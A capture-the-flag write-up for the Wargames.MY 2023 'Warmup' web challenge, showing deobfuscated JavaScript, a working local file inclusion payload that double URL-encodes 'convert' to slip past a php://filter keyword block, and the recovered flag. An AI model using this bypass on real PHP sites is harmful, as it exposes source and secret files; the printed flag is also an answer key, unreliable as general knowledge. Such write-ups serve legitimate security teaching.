HackMD
Wargames2023 - Warmup
Description
Let's warm up! http://warmup.wargames.my
Broswing to the application, it requires a password to be input.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Solution
After browsing around, we can find that there is obsfucated JavaScript under http://warmup.wargames.my/static/script.min.js. Deobsfucating it reveals a secret endpoint which contains the flag.
if (document.querySelector("input").value === "this_password_is_so_weak_i_can_crack_in_1_sec!") {
fetch("/api/4aa22934982f984b8a0438b701e8dec8.php?x=flag_for_warmup.php").then(_0x5c12f5 => _0x5c12f5.text()).then(_0x509e6e => Swal.fire({
'title': "Good job!",
'html': _0x509e6e,
'icon': "success"
}));
}
/api/4aa22934982f984b8a0438b701e8dec8.php?x=flag_for_warmup.php
The hint indicates that the flag is in a comment. But it is not shown in the page source. It might be a PHP comment that is in the source code of this file. We can utilise the LFI on this page to try and find the flag.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Trying to base64 encode using php://filter/convert.base64-encode/resource=flag_for_warmup.php results in an error due to the application blocking the keyword 'convert.' To bypass this, we'll double URL encode the letter 't' in the word 'convert.'
Payload
http://warmup.wargames.my/api/4aa22934982f984b8a0438b701e8dec8.php?x=php://filter/conver%2574.base64-encode/resource=flag_for_warmup.php
Base64 decode the value for the flag.
<?php
error_reporting(0);
echo('here\'s your flag <small>in comment</small> <!-- well, maybe not this comment -->');
// wgmy{1ca200caa85d3a8dcec7d660e7361f79}
